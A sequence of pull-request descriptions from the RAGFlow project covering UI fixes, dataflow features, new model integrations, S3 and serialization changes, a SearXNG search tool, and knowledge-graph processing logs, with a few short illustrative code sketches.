- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The chat dialog box cannot be fully displayed on a small screen #10034
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Hide dataflow related functions #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix text input exceeding the token limit when using siliconflow's
embedding models BAAI/bge-large-zh-v1.5 and BAAI/bge-large-en-v1.5 by
truncating the text before it is sent.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Translate the parser operator #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
feat: Added UI functions related to data-flow knowledge base #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Import dsl from agent list page #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Update default LLM configuration with BAAI and model details #9404
- Add SMTP configuration section #9479
- Add OpenDAL storage configuration option #8232
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add type card to create agent dialog #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue where newly added tool operators would disappear
after editing the form #10013
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Dataflow supports markdown.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Dataflow supports spreadsheet and word processor documents.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.20.4 to v0.20.5
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Feat: Translate the maxRounds field of the chat settings #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The prompt word "plan" is displayed only when the agent operator
has sub-agent operators or sub-tool operators. #10000
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Optimize search functionality
- Fixed search limitations when no dataset is selected
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Optimized the table of contents style and homepage card layout
#3221
- Added background color, text color, and shadow styles to the Markdown
table of contents
- Optimized the date display style in the HomeCard component to prevent
overflow
- Standardized the translation of "dataset" to "knowledge base" to
improve terminology consistency
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Highlight the edges after running #9538
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Issue of ineffective weight adjustment for retrieval_test
API-related functions #9854
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add ParserForm to the data pipeline #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add LongCat-Flash-Chat from Meituan, deepseek v3.1 from SiliconFlow,
kimi-k2-09-05-preview and kimi-k2-turbo-preview from Moonshot.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The agent's external page should be able to fill in the begin
parameter after being reset in task mode #9745
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Update the pagination prompt text in zh.ts, changing "page" to
"item/page"
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add ConfirmDeleteDialog storybook #9914
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Optimized the test results page layout and internationalization
- Added an empty data component for when test results are empty
- Optimized internationalization support for the paging component
- Updated the layout and style of the test results page
- Added a tooltip for when test results are empty
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: The files in the knowledge base folder on the file management page
should not be deleted #9975
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Delete unused code in the data pipeline #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The total token count was incorrectly accumulated when using the
OpenAI-API-Compatible API.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Refine dataflow and initialize dataflow app.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Use sonner to replace the requested prompt message component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Allow users to select prompt word templates in agent operators.
#9935
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- Added the metadata_dedition parameter in the document retrieval
interface to filter document metadata
- Updated the API documentation and added explanations for the
metadata_dedition parameter
### What problem does this PR solve?
Allow the /api/v1/retrieval API to use a metadata filter as well.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
### Type of change
- [x] Refactoring
- [x] Performance Improvement
Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
### What problem does this PR solve?
Moved `signature_version` and `addressing_style` parameters to a
`Config` object from `botocore.config`
`signature_version` is now passed as `Config(signature_version='v4')`
`addressing_style` is now passed as `Config(s3={'addressing_style':
'path'})`
The `Config` object is then passed to `boto3.client()` via the `config`
parameter
## Changes Made
- Modified `rag/utils/s3_conn.py` in the `__open__()` method
- Updated parameter handling logic to use `config_kwargs` dictionary
- Maintained backward compatibility for configurations without these
parameters
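The parameter handling described above can be sketched roughly as follows. This is an illustration only, not the code in `rag/utils/s3_conn.py`: the helper names `build_config_kwargs` and `open_client` and the keys of the `settings` dictionary are assumptions.

```python
def build_config_kwargs(settings: dict) -> dict:
    """Collect only the botocore Config options present in settings."""
    config_kwargs = {}
    if settings.get("signature_version"):
        config_kwargs["signature_version"] = settings["signature_version"]
    if settings.get("addressing_style"):
        # addressing_style lives under the nested "s3" key of Config
        config_kwargs["s3"] = {"addressing_style": settings["addressing_style"]}
    return config_kwargs


def open_client(settings: dict):
    """Create an S3 client, passing a Config only when one is needed."""
    import boto3  # imported lazily so build_config_kwargs has no dependencies
    from botocore.config import Config

    client_kwargs = {
        "region_name": settings.get("region"),          # hypothetical key
        "endpoint_url": settings.get("endpoint_url"),   # hypothetical key
    }
    config_kwargs = build_config_kwargs(settings)
    if config_kwargs:
        client_kwargs["config"] = Config(**config_kwargs)
    return boto3.client("s3", **client_kwargs)
```

Configurations that set neither option produce an empty dictionary, so no `Config` is passed and the client is created as before.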
## Related Issue
Fixes #9910
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Syed Shahmeer Ali <ashahmeer73@gmail.com>
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
- [x] Performance Improvement
Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
### What problem does this PR solve?
fix: Optimize internationalization configuration
- Update multi-language options, adding general translations for
functions like Select All and Clear
- Add internationalization support for modules like Chat, Search, and
Datasets
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Added RenameDialog NumberInput and Spin storybook
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR fixes a critical bug in the knowledge base isolation feature
where chat responses were referencing documents from incorrect knowledge
bases. The issue was in the `infinity_conn.py` file where the
`equivalent_condition_to_str()` function was incorrectly skipping
`kb_id` filtering, causing documents from unintended knowledge bases to
be included in search results.
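To illustrate the kind of bug described here, the following is a simplified sketch of turning an equality-condition dictionary into a filter string without skipping `kb_id`. It is not the actual `equivalent_condition_to_str()` implementation; the function name `condition_to_filter`, the field `available_int`, and the output syntax are assumptions.

```python
def condition_to_filter(condition: dict) -> str:
    """Build an AND-joined filter string from a condition dictionary.

    Every key, including kb_id, contributes a clause. Dropping the kb_id
    clause would let rows from other knowledge bases match.
    Note: values are not escaped here; this is only a sketch.
    """
    clauses = []
    for key, value in condition.items():
        if isinstance(value, list):
            if not value:
                continue  # an empty list adds no constraint in this sketch
            quoted = ", ".join(
                f"'{v}'" if isinstance(v, str) else str(v) for v in value
            )
            clauses.append(f"{key} IN ({quoted})")
        elif isinstance(value, str):
            clauses.append(f"{key} = '{value}'")
        else:
            clauses.append(f"{key} = {value}")
    return " AND ".join(clauses) if clauses else "1=1"
```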
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Syed Shahmeer Ali <ashahmeer73@gmail.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix the container name conflict in CI.
[CI error](https://github.com/infiniflow/ragflow/actions/runs/17452439789/job/49559702590?pr=9894)
```
Container ragflow-redis Error response from daemon: Conflict. The container name "/ragflow-redis" is already in use by container "b6cbde4d186ffba701f6e2a85f37e1d053d7197adb2938547f1df08cfcadf355". You have to remove (or rename) that container to be able to reuse that name.
Error response from daemon: Conflict. The container name "/ragflow-redis" is already in use by container "b6cbde4d186ffba701f6e2a85f37e1d053d7197adb2938547f1df08cfcadf355". You have to remove (or rename) that container to be able to reuse that name.
Error: Process completed with exit code 1.
```
### Type of change
- [x] Refactoring
- [x] Performance Improvement
Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
### What problem does this PR solve?
Feat: Display AvatarUpload and RAGFlowAvatar in Storybook #9914
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix wrong chunk number while re-parsing document and keeping original
chunks
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Use storybook to display public components. #9914
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The HTTP API documentation incorrectly refers to `agent_name` as `name`
instead of `title`. This PR updates the documentation with the correct term.
As per the codebase, the GET request for listing agents accepts
`title` as a parameter:
9b026fc5b6/api/apps/sdk/agent.py (L32)
This is referred to as the `name` parameter in the HTTP API documentation
([link](https://ragflow.io/docs/dev/http_api_reference#list-documents))
```
GET /api/v1/datasets/{dataset_id}/documents?page={page}&page_size={page_size}&orderby={orderby}&desc={desc}&keywords={keywords}&id={document_id}&name={document_name}&create_time_from={timestamp}&create_time_to={timestamp}
```
Meanwhile, it is correctly mentioned in the Python API docs
([link](https://ragflow.io/docs/dev/python_api_reference#list-agents)):
```
RAGFlow.list_agents(
page: int = 1,
page_size: int = 30,
orderby: str = "create_time",
desc: bool = True,
id: str = None,
title: str = None
) -> List[Agent]
```
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
During the chat, the assistant's response cited documents outside the
current knowledge base.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Allow users to enter SQL in the SQL operator #9897
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add `canvas_category` field for UserCanvas and CanvasTemplate.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add exponential back-off for Chat LiteLLM. #9858.
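A minimal sketch of exponential back-off, for readers unfamiliar with the technique. It is not the code added to the LiteLLM chat wrapper; the function name `call_with_backoff` and all default values are assumptions.

```python
import random
import time


def call_with_backoff(func, max_retries=5, base_delay=1.0, max_delay=30.0,
                      sleep=time.sleep):
    """Call func(), retrying with exponentially growing delays on failure."""
    for attempt in range(max_retries + 1):
        try:
            return func()
        except Exception:
            # A real implementation would retry only on transient errors
            # such as rate limits or timeouts.
            if attempt == max_retries:
                raise
            delay = min(max_delay, base_delay * (2 ** attempt))
            # Add up to 10% jitter so concurrent clients do not retry in sync.
            sleep(delay + random.uniform(0, delay * 0.1))
```

The `sleep` parameter is injectable so the retry schedule can be checked without actually waiting.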
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: The operator added by clicking the plus sign will overlap with the
original operator. #9886
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Optimize list display and rename functionality #3221
- Updated the homepage search list display style and added rename
functionality
- Used the RenameDialog component for rename searches
- Optimized list height calculation
- Updated the style and layout of related pages
- fix issue #9779
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- Add robust serialize_for_json() function to handle non-serializable
objects
- Update server_error_response() to safely serialize exception data
- Update get_json_result() with fallback error handling
- Handles ModelMetaclass, functions, and other problematic objects
- Maintains proper JSON response format instead of server crashes
Fixes #9797
### What problem does this PR solve?
Currently, error responses and certain result objects may include types
that are not JSON serializable (e.g., ModelMetaclass, functions). This
causes server crashes instead of returning valid JSON responses.
This PR introduces a robust serializer that converts unsupported types
into string representations, ensuring the server always returns a valid
JSON response.
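The idea of falling back to string representations can be sketched as below. The name `serialize_for_json` comes from this PR, but the body is an assumption written for illustration, not the implementation that was merged.

```python
import json


def serialize_for_json(obj):
    """Recursively convert obj into something json.dumps can handle."""
    if obj is None or isinstance(obj, (str, int, float, bool)):
        return obj
    if isinstance(obj, dict):
        return {str(k): serialize_for_json(v) for k, v in obj.items()}
    if isinstance(obj, (list, tuple, set)):
        return [serialize_for_json(v) for v in obj]
    # Classes, functions, and any other unsupported object become strings
    # instead of raising TypeError inside json.dumps.
    return str(obj)
```

With this in place, a payload such as `{"data": {"cls": dict, "fn": len}}` can be passed through `serialize_for_json` and then to `json.dumps` without raising.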
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Initialize the data pipeline canvas. #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: By default, 50 records are displayed per page. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue where the agent and chat cards on the home page
could not be deleted #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
In the openai-python client, the default value of the `encoding_format`
parameter for `/v1/embeddings` is `base64`. Pass `float` explicitly to avoid
base64 encoding and decoding and the larger data size.
https://github.com/openai/openai-python/blob/main/src/openai/resources/embeddings.py
if not is_given(encoding_format):
params["encoding_format"] = "base64"
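The decoding step that `float` avoids can be illustrated with the standard library alone. This is a sketch under the assumption that a base64 embedding is a packed array of little-endian 32-bit floats; the helper name `decode_base64_embedding` is hypothetical.

```python
import base64
import struct


def decode_base64_embedding(data: str) -> list:
    """Decode a base64 string of packed float32 values into Python floats."""
    raw = base64.b64decode(data)
    count = len(raw) // 4  # 4 bytes per float32
    return list(struct.unpack(f"<{count}f", raw))
```

When the response already contains a list of floats, none of this work is needed on the client side.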
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Feat: Move the dataset permission drop-down box to a separate file for
better permission control #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Optimize page layout and style #3221
- Added the cursor-pointer class to the logo in the Header component
- Added an icon property to the ListFilterBar in the Agents and ChatList
components
- Adjusted the Dataset page layout and set a minimum width
- Optimized the DatasetWrapper page layout and added the overflow-auto
class
- Simplified the search icon in the SearchList component
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix: Optimize styling and add a search settings loading state #3221
- Updated the calendar component's background color to use a variable
- Modified the Spin component's styling to use the primary text color
instead of black
- Added a form submission loading state to the search settings component
- Optimized the search settings form, unifying the styles of the model
selection and input fields
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Create a conversation before uploading files #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This revision performed a comprehensive check on LightRAG to ensure the
correctness of its implementation. It **did not involve** Entity
Resolution and Community Reports Generation. There is an example using
default entity types and the General chunking method, which shows good
results in both time and effectiveness. Moreover, response caching is
enabled for resuming failed tasks.
[The-Necklace.pdf](https://github.com/user-attachments/files/22042432/The-Necklace.pdf)
After:

```bash
Begin at:
Fri, 29 Aug 2025 16:48:03 GMT
Duration:
222.31 s
Progress:
16:48:04 Task has been received.
16:48:06 Page(1~7): Start to parse.
16:48:06 Page(1~7): OCR started
16:48:08 Page(1~7): OCR finished (1.89s)
16:48:11 Page(1~7): Layout analysis (3.72s)
16:48:11 Page(1~7): Table analysis (0.00s)
16:48:11 Page(1~7): Text merged (0.00s)
16:48:11 Page(1~7): Finish parsing.
16:48:12 Page(1~7): Generate 7 chunks
16:48:12 Page(1~7): Embedding chunks (0.29s)
16:48:12 Page(1~7): Indexing done (0.04s). Task done (7.84s)
16:48:17 Start processing for f421fb06849e11f0bdd32724b93a52b2: She had no dresses, no je...
16:48:17 Start processing for f421fb06849e11f0bdd32724b93a52b2: Her husband, already half...
16:48:17 Start processing for f421fb06849e11f0bdd32724b93a52b2: And this life lasted ten ...
16:48:17 Start processing for f421fb06849e11f0bdd32724b93a52b2: Then she asked, hesitatin...
16:49:30 Completed processing for f421fb06849e11f0bdd32724b93a52b2: She had no dresses, no je... after 1 gleanings, 21985 tokens.
16:49:30 Entities extraction of chunk 3 1/7 done, 12 nodes, 13 edges, 21985 tokens.
16:49:40 Completed processing for f421fb06849e11f0bdd32724b93a52b2: Finally, she replied, hes... after 1 gleanings, 22584 tokens.
16:49:40 Entities extraction of chunk 5 2/7 done, 19 nodes, 19 edges, 22584 tokens.
16:50:02 Completed processing for f421fb06849e11f0bdd32724b93a52b2: Then she asked, hesitatin... after 1 gleanings, 24610 tokens.
16:50:02 Entities extraction of chunk 0 3/7 done, 16 nodes, 28 edges, 24610 tokens.
16:50:03 Completed processing for f421fb06849e11f0bdd32724b93a52b2: And this life lasted ten ... after 1 gleanings, 24031 tokens.
16:50:04 Entities extraction of chunk 1 4/7 done, 24 nodes, 22 edges, 24031 tokens.
16:50:14 Completed processing for f421fb06849e11f0bdd32724b93a52b2: So they begged the jewell... after 1 gleanings, 24635 tokens.
16:50:14 Entities extraction of chunk 6 5/7 done, 27 nodes, 26 edges, 24635 tokens.
16:50:29 Completed processing for f421fb06849e11f0bdd32724b93a52b2: Her husband, already half... after 1 gleanings, 25758 tokens.
16:50:29 Entities extraction of chunk 2 6/7 done, 25 nodes, 35 edges, 25758 tokens.
16:51:35 Completed processing for f421fb06849e11f0bdd32724b93a52b2: The Necklace By Guy de Ma... after 1 gleanings, 27491 tokens.
16:51:35 Entities extraction of chunk 4 7/7 done, 39 nodes, 37 edges, 27491 tokens.
16:51:35 Entities and relationships extraction done, 147 nodes, 177 edges, 171094 tokens, 198.58s.
16:51:35 Entities merging done, 0.01s.
16:51:35 Relationships merging done, 0.01s.
16:51:35 ignored 7 relations due to missing entities.
16:51:35 generated subgraph for doc f421fb06849e11f0bdd32724b93a52b2 in 198.68 seconds.
16:51:35 run_graphrag f421fb06849e11f0bdd32724b93a52b2 graphrag_task_lock acquired
16:51:35 set_graph removed 0 nodes and 0 edges from index in 0.00s.
16:51:35 Get embedding of nodes: 9/147
16:51:35 Get embedding of nodes: 109/147
16:51:37 Get embedding of edges: 9/170
16:51:37 Get embedding of edges: 109/170
16:51:40 set_graph converted graph change to 319 chunks in 4.21s.
16:51:40 Insert chunks: 4/319
16:51:40 Insert chunks: 104/319
16:51:40 Insert chunks: 204/319
16:51:40 Insert chunks: 304/319
16:51:40 set_graph added/updated 147 nodes and 170 edges from index in 0.53s.
16:51:40 merging subgraph for doc f421fb06849e11f0bdd32724b93a52b2 into the global graph done in 4.79 seconds.
16:51:40 Knowledge Graph done (204.29s)
```
Before:

```bash
Begin at:
Fri, 29 Aug 2025 17:00:47 GMT
processDuration:
173.38 s
Progress:
17:00:49 Task has been received.
17:00:51 Page(1~7): Start to parse.
17:00:51 Page(1~7): OCR started
17:00:53 Page(1~7): OCR finished (1.82s)
17:00:57 Page(1~7): Layout analysis (3.64s)
17:00:57 Page(1~7): Table analysis (0.00s)
17:00:57 Page(1~7): Text merged (0.00s)
17:00:57 Page(1~7): Finish parsing.
17:00:57 Page(1~7): Generate 7 chunks
17:00:57 Page(1~7): Embedding chunks (0.31s)
17:00:57 Page(1~7): Indexing done (0.03s). Task done (7.88s)
17:00:57 created task graphrag
17:01:00 Task has been received.
17:02:17 Entities extraction of chunk 1 1/7 done, 9 nodes, 9 edges, 10654 tokens.
17:02:31 Entities extraction of chunk 2 2/7 done, 12 nodes, 13 edges, 11066 tokens.
17:02:33 Entities extraction of chunk 4 3/7 done, 9 nodes, 10 edges, 10433 tokens.
17:02:42 Entities extraction of chunk 5 4/7 done, 11 nodes, 14 edges, 11290 tokens.
17:02:52 Entities extraction of chunk 6 5/7 done, 13 nodes, 15 edges, 11039 tokens.
17:02:55 Entities extraction of chunk 3 6/7 done, 14 nodes, 13 edges, 11466 tokens.
17:03:32 Entities extraction of chunk 0 7/7 done, 19 nodes, 18 edges, 13107 tokens.
17:03:32 Entities and relationships extraction done, 71 nodes, 89 edges, 79055 tokens, 149.66s.
17:03:32 Entities merging done, 0.01s.
17:03:32 Relationships merging done, 0.01s.
17:03:32 ignored 1 relations due to missing entities.
17:03:32 generated subgraph for doc b1d9d3b6848711f0aacd7ddc0714c4d3 in 149.69 seconds.
17:03:32 run_graphrag b1d9d3b6848711f0aacd7ddc0714c4d3 graphrag_task_lock acquired
17:03:32 set_graph removed 0 nodes and 0 edges from index in 0.00s.
17:03:32 Get embedding of nodes: 9/71
17:03:33 Get embedding of edges: 9/88
17:03:34 set_graph converted graph change to 161 chunks in 2.27s.
17:03:34 Insert chunks: 4/161
17:03:34 Insert chunks: 104/161
17:03:34 set_graph added/updated 71 nodes and 88 edges from index in 0.28s.
17:03:34 merging subgraph for doc b1d9d3b6848711f0aacd7ddc0714c4d3 into the global graph done in 2.60 seconds.
17:03:34 Knowledge Graph done (153.18s)
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
- [x] Performance Improvement
### What problem does this PR solve?
Feat: Allow users to delete their profile pictures #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Optimized the style and functionality of multiple components #3221
- Modified the SkeletonCard component, adding a className attribute and
adjusting the style
- Updated the RAGFlowSelect component, adding a disabled attribute
- Adjusted the style of the Tooltip component
- Optimized the layout of the RetrievalTesting and TestingResult pages
- Updated the style and loading status display of NextSearch-related
pages
- Removed unnecessary logs from the Spotlight component
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR integrates SearXNG as a new search tool for Agents. It adds
corresponding form/config UI on the frontend and a new tool
implementation on the backend, enabling aggregated web searches via a
self-hosted SearXNG instance within chats/workflows. It also adds
multilingual copy to support internationalized presentation and
configuration guidance.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What’s Changed
- Frontend: new SearXNG tool configuration, forms, and command wiring
- Main changes under `web/src/pages/agent/`
- New components and form entries are connected to Agent tool selection
and workflow node configuration
- Backend: new tool implementation
- `agent/tools/searxng.py`: connects to a SearXNG instance and performs
search based on the provided instance URL and query parameters
- i18n updates
- Added/updated keys under `web/src/locales/`: `searXNG` and
`searXNGDescription`
- English reference in `web/src/locales/en.ts`:
- `searXNG: 'SearXNG'`
- `searXNGDescription: 'A component that searches via your provided
SearXNG instance URL. Specify TopN and the instance URL.'`
- Other languages have `searXNG` and `searXNGDescription` added as well,
but accuracy is only guaranteed for English, Simplified Chinese, and
Traditional Chinese.
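For orientation, a request to a SearXNG instance can be sketched as follows. This is not the code in `agent/tools/searxng.py`; the helper names are hypothetical, and the sketch assumes the instance has JSON output enabled for its `/search` endpoint.

```python
from urllib.parse import urlencode


def build_search_url(instance_url: str, query: str) -> str:
    """Build a SearXNG search URL that asks for JSON results."""
    params = urlencode({"q": query, "format": "json"})
    return f"{instance_url.rstrip('/')}/search?{params}"


def top_n(results: list, n: int) -> list:
    """Keep only the first n results, mirroring a TopN setting."""
    return results[:n]
```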
---------
Co-authored-by: xurui <xurui@crscd.com.cn>
### What problem does this PR solve?
Fix: Fixed the issue that similarity threshold modification in chat and
search configuration failed #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Ollama chat could only access a localhost instance. #9806.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Optimized Input and MultiSelect component functionality and
dataSet-chunk page styling
- Updated @js-preview/excel to version 1.7.14 #9779
- Optimized the EditTag component
- Updated the Input component to optimize numeric input processing
- Adjusted the MultiSelect component to use lodash's isEmpty method
- Optimized the CheckboxSets component to display action buttons based
on the selected state
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Extract the save buttons for dataset and chat configurations to
separate files to increase permission control #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue where the thinking mode on the chat page could not
be turned off #9789
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Unify reference format of agent completion and OpenAI-compatible
completion API.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Fix: Optimized variable node display and Agent template multi-language
support #3221
- Modified the VariableNode component to add parent label and icon
properties
- Updated the VariablePickerMenuPlugin to support displaying parent
labels and icons
- Adjusted useBuildNodeOutputOptions and useBuildBeginVariableOptions to
pass new properties
- Optimized the Agent TemplateCard component to switch the title and
description based on the language
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Use AvatarUpload to replace the avatar settings on the dataset and
search pages #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR enhances the display of tags in the UI.
* Before: Model tags were shown as a single string with commas.
* After: Model tags are split by commas and displayed as individual
`<Tag>` components, making them visually distinct and easier to read.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The agent directly outputs the results in task mode #9745
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Fix Add Russian language.
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add AvatarUpload component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Updates the installation step in README.md to explicitly include
pre-commit alongside uv.
Applies the change to all localized versions: English, Chinese,
Japanese, Korean, Indonesian, and Portuguese.
#### Why this is needed:
The installation instructions previously mentioned only uv, but
pre-commit is also required for contributing.
Ensures consistency across all language versions and helps new
contributors set up the environment correctly.
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Revert broken agent completion by #9631.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.20.3 to v0.20.4
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Optimize the MultiSelect component and system prompt templates
#3221
- Modify the conditional statements in the MultiSelect component, using
the ?. operator to improve code readability
- Optimize the formatting of the system prompt template to make it more
standardized and easier to read
- Update the Chinese translation, changing "ExeSQL" to "Execute SQL"
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix: Fixed the issue that the agent embedded page needs to be logged in
#9750
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Optimize tooltips and i18n #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix(i18n): Added new translations #3221
- Added and updated internationalization translations in multiple
components
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix: After deleting the knowledge graph, jump to the dataset page #9722
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Try to fix the issue of not being able to log in through OAuth2
#9601
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add Zhipu GLM-4.5 model series. #9708.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Add the ZhipuAI GLM-4.5 model series.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Chunk error when re-parsing created file
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
In the `total_token_count` method, check with `if` first instead of relying
on exception handling, to improve performance in the exceptional cases.
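The check-first style can be sketched as below. The response shapes handled here (a dictionary or an object with a `usage` attribute carrying `total_tokens`) are assumptions for illustration and not necessarily the cases the project's `total_token_count` covers.

```python
def total_token_count(resp):
    """Return the total token count from a response, or 0 if unavailable."""
    if resp is None:
        return 0
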